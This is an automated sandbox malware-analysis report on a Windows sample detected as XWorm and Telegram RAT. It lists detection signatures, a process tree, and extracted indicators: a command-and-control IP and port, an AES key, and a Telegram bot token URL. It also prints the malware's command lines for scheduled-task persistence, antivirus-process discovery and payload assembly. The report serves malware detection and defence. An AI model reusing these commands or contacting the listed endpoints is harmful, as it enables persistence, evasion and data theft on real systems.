Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DA92phBHUS.exe

Overview

General Information

Sample name:DA92phBHUS.exe
renamed because original name is a hash value
Original sample name:649673218a19e8fd278c99d1355949f4.exe
Analysis ID:1544503
MD5:649673218a19e8fd278c99d1355949f4
SHA1:da2b13b98dbb3ba3973388866860cb7cb3d2b59e
SHA256:7a2c1437ed5ff19adf078f17881fc836a4b08d3eaaff243d5ca77577f5880169
Tags:32exe
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Drops PE files with a suspicious file extension
Injects a PE file into a foreign processes
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: WScript or CScript Dropper
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript called in batch mode (surpress errors)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • DA92phBHUS.exe (PID: 888 cmdline: "C:\Users\user\Desktop\DA92phBHUS.exe" MD5: 649673218A19E8FD278C99D1355949F4)
    • cmd.exe (PID: 2828 cmdline: "C:\Windows\System32\cmd.exe" /c copy Highlighted Highlighted.bat & Highlighted.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 3744 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 2416 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 1720 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 5608 cmdline: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5848 cmdline: cmd /c md 438799 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 6112 cmdline: findstr /V "pantyhoseyourslandscapesdisposition" Flyer MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6940 cmdline: cmd /c copy /b ..\Turn + ..\Tale + ..\Intensity L MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Dump.pif (PID: 5432 cmdline: Dump.pif L MD5: 18CE19B57F43CE0A5AF149C96AECC685)
        • cmd.exe (PID: 5328 cmdline: cmd /c schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 4484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 1072 cmdline: schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
        • schtasks.exe (PID: 6672 cmdline: schtasks.exe /create /tn "ImageSyncProX" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc onlogon /F /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
          • conhost.exe (PID: 3688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • RegAsm.exe (PID: 3608 cmdline: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • choice.exe (PID: 5436 cmdline: choice /d y /t 15 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • wscript.exe (PID: 6668 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • ImageSyncProX.scr (PID: 2688 cmdline: "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr" "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\m" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["193.41.226.233"], "Port": "2222", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7981465575:AAEW4gOQw1_KaLtAHUtM3Ol8vEbq1ghRfE0/sendMessage"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XWorm_1Yara detected XWormJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000A.00000003.2672114464.00000000014C0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      0000000A.00000003.2672114464.00000000014C0000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x7ec3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x10b33:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x7f60:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x10bd0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x8075:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x10ce5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x7b71:$cnc4: POST / HTTP/1.1
      • 0x107e1:$cnc4: POST / HTTP/1.1
      0000000A.00000003.2672114464.00000000014B2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        0000000A.00000003.2672114464.00000000014B2000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x7ebb:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x7f58:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x806d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x7b69:$cnc4: POST / HTTP/1.1
        00000017.00000002.2972619420.0000000001032000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
          Click to see the 15 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          23.2.RegAsm.exe.1030000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
            23.2.RegAsm.exe.1030000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              23.2.RegAsm.exe.1030000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0x8073:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0x8110:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0x8225:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0x7d21:$cnc4: POST / HTTP/1.1
              10.3.Dump.pif.151caa0.1.unpackJoeSecurity_XWormYara detected XWormJoe Security
                10.3.Dump.pif.151caa0.1.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                • 0x6273:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                • 0x6310:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                • 0x6425:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                • 0x5f21:$cnc4: POST / HTTP/1.1
                Click to see the 8 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
                Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe, ParentCommandLine: Dump.pif L, ParentImage: C:\Users\user\AppData\Local\Temp\438799\Dump.pif, ParentProcessId: 5432, ParentProcessName: Dump.pif, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe, ProcessId: 3608, ProcessName: RegAsm.exe
                Sigma detected: Invoke-Obfuscation CLIP+ Launcher
                Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: cmd /c schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine: cmd /c schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: Dump.pif L, ParentImage: C:\Users\user\AppData\Local\Temp\438799\Dump.pif, ParentProcessId: 5432, ParentProcessName: Dump.pif, ProcessCommandLine: cmd /c schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, ProcessId: 5328, ProcessName: cmd.exe
                Sigma detected: Invoke-Obfuscation VAR+ Launcher
                Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: cmd /c schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine: cmd /c schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: Dump.pif L, ParentImage: C:\Users\user\AppData\Local\Temp\438799\Dump.pif, ParentProcessId: 5432, ParentProcessName: Dump.pif, ProcessCommandLine: cmd /c schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, ProcessId: 5328, ProcessName: cmd.exe
                Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine: schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5328, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, ProcessId: 1072, ProcessName: schtasks.exe
                Sigma detected: WScript or CScript Dropper
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js", ProcessId: 6668, ProcessName: wscript.exe
                Sigma detected: Execution of Suspicious File Type Extension
                Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: Dump.pif L, CommandLine: Dump.pif L, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\438799\Dump.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\438799\Dump.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\438799\Dump.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Highlighted Highlighted.bat & Highlighted.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2828, ParentProcessName: cmd.exe, ProcessCommandLine: Dump.pif L, ProcessId: 5432, ProcessName: Dump.pif
                Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
                Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe, ParentCommandLine: Dump.pif L, ParentImage: C:\Users\user\AppData\Local\Temp\438799\Dump.pif, ParentProcessId: 5432, ParentProcessName: Dump.pif, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe, ProcessId: 3608, ProcessName: RegAsm.exe
                Sigma detected: SCR File Write Event
                Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\438799\Dump.pif, ProcessId: 5432, TargetFilename: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr
                Sigma detected: Suspicious Add Scheduled Task Parent
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "ImageSyncProX" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc onlogon /F /RL HIGHEST, CommandLine: schtasks.exe /create /tn "ImageSyncProX" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc onlogon /F /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: Dump.pif L, ParentImage: C:\Users\user\AppData\Local\Temp\438799\Dump.pif, ParentProcessId: 5432, ParentProcessName: Dump.pif, ProcessCommandLine: schtasks.exe /create /tn "ImageSyncProX" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc onlogon /F /RL HIGHEST, ProcessId: 6672, ProcessName: schtasks.exe
                Sigma detected: Suspicious Copy From or To System Directory
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Highlighted Highlighted.bat & Highlighted.bat, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Highlighted Highlighted.bat & Highlighted.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\DA92phBHUS.exe", ParentImage: C:\Users\user\Desktop\DA92phBHUS.exe, ParentProcessId: 888, ParentProcessName: DA92phBHUS.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Highlighted Highlighted.bat & Highlighted.bat, ProcessId: 2828, ProcessName: cmd.exe
                Sigma detected: Suspicious Schtasks From Env Var Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine: schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5328, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, ProcessId: 1072, ProcessName: schtasks.exe
                Sigma detected: Suspicious Screensaver Binary File Creation
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\438799\Dump.pif, ProcessId: 5432, TargetFilename: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr
                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js", ProcessId: 6668, ProcessName: wscript.exe

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Sigma detected: Search for Antivirus process
                Source: Process startedAuthor: Joe Security: Data: Command: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Highlighted Highlighted.bat & Highlighted.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2828, ParentProcessName: cmd.exe, ProcessCommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , ProcessId: 5608, ProcessName: findstr.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-29T14:17:48.652355+010028536851A Network Trojan was detected192.168.2.464427149.154.167.220443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-29T14:17:59.616383+010028528701Malware Command and Control Activity Detected193.41.226.2332222192.168.2.464431TCP
                2024-10-29T14:18:10.149694+010028528701Malware Command and Control Activity Detected193.41.226.2332222192.168.2.464431TCP
                2024-10-29T14:18:13.784635+010028528701Malware Command and Control Activity Detected193.41.226.2332222192.168.2.464431TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-29T14:17:59.653552+010028529231Malware Command and Control Activity Detected192.168.2.464431193.41.226.2332222TCP
                2024-10-29T14:18:10.152577+010028529231Malware Command and Control Activity Detected192.168.2.464431193.41.226.2332222TCP
                2024-10-29T14:18:13.785604+010028529231Malware Command and Control Activity Detected192.168.2.464431193.41.226.2332222TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-29T14:17:59.365704+010028559241Malware Command and Control Activity Detected192.168.2.464431193.41.226.2332222TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 0000000A.00000003.2672114464.00000000014C0000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["193.41.226.233"], "Port": "2222", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                Source: RegAsm.exe.3608.23.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7981465575:AAEW4gOQw1_KaLtAHUtM3Ol8vEbq1ghRfE0/sendMessage"}
                Multi AV Scanner detection for submitted file
                Source: DA92phBHUS.exeReversingLabs: Detection: 18%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.4% probability
                Sample uses string decryption to hide its real strings
                Source: 23.2.RegAsm.exe.1030000.0.unpackString decryptor: 193.41.226.233
                Source: 23.2.RegAsm.exe.1030000.0.unpackString decryptor: 2222
                Source: 23.2.RegAsm.exe.1030000.0.unpackString decryptor: <123456789>
                Source: 23.2.RegAsm.exe.1030000.0.unpackString decryptor: <Xwormmm>
                Source: 23.2.RegAsm.exe.1030000.0.unpackString decryptor: XWORM v5.6
                Source: 23.2.RegAsm.exe.1030000.0.unpackString decryptor: USB.exe
                Source: DA92phBHUS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:64427 version: TLS 1.2
                Source: DA92phBHUS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: RegAsm.pdb source: RegAsm.exe, 00000017.00000000.2618092586.0000000000C52000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe.10.dr
                Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000017.00000000.2618092586.0000000000C52000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe.10.dr
                Source: C:\Users\user\Desktop\DA92phBHUS.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
                Source: C:\Users\user\Desktop\DA92phBHUS.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
                Source: C:\Users\user\Desktop\DA92phBHUS.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00EA4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00EA4005
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00EA494A GetFileAttributesW,FindFirstFileW,FindClose,10_2_00EA494A
                Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pifCode function: 10_2_00EA3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00EA3CE2
